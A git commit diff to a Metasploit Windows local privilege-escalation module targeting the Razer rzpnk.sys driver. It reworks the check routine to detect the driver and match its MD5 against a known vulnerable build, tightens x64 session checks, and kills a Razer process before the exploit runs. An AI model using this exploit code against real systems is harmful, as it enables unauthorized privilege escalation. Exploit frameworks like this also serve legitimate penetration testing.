Update the pre-exploit check conditions

2017-07-15 14:48:54 -04:00 · 2017-07-15 14:48:54 -04:00 · b4813ce2c7
parent 833b2a67d4
commit b4813ce2c7
1 changed files with 19 additions and 12 deletions
--- a/modules/exploits/windows/local/razer_zwopenprocess.rb
+++ b/modules/exploits/windows/local/razer_zwopenprocess.rb
@ -70,15 +70,22 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def check
-    pid = session.sys.process['RazerIngameEngine.exe']
-    session.sys.process.kill(pid) unless pid.nil?
+    # Validate that the driver has been loaded and that
+    # the version is the same as the one expected
+    client.sys.config.getdrivers.each do |d|
+      if d[:basename].downcase == 'rzpnk.sys'
+        expected_checksum = 'b4598c05d5440250633e25933fff42b0'
+        target_checksum = client.fs.file.md5(d[:filename])

-    pid = session.sys.process['winlogon.exe']
-    handle = get_handle(pid)
-    return Exploit::CheckCode::Safe if handle.nil?
+        if expected_checksum == Rex::Text.to_hex(target_checksum, '')
+          return Exploit::CheckCode::Appears
+        else
+          return Exploit::CheckCode::Detected
+        end
+      end
+    end

-    session.railgun.kernel32.CloseHandle(handle)
-    Exploit::CheckCode::Vulnerable
+    Exploit::CheckCode::Safe
  end

  def exploit
@ -90,14 +97,14 @@ class MetasploitModule < Msf::Exploit::Remote
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    end

-    if sysinfo['Architecture'] =~ /wow64/i
-      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
-    elsif sysinfo['Architecture'] == ARCH_X86
-      fail_with(Failure::NoTarget, 'Session host is x86, but only x64 targets are supported')
+    if session.platform != 'windows'
+      fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
+    elsif session.arch != ARCH_X64
+      fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')
    end

    pid = session.sys.process['RazerIngameEngine.exe']
-    unless pid.nil?
+    if pid
      # if this process is running, the IOCTL won't work but the process runs
      # with user privileges so we can kill it
      print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...")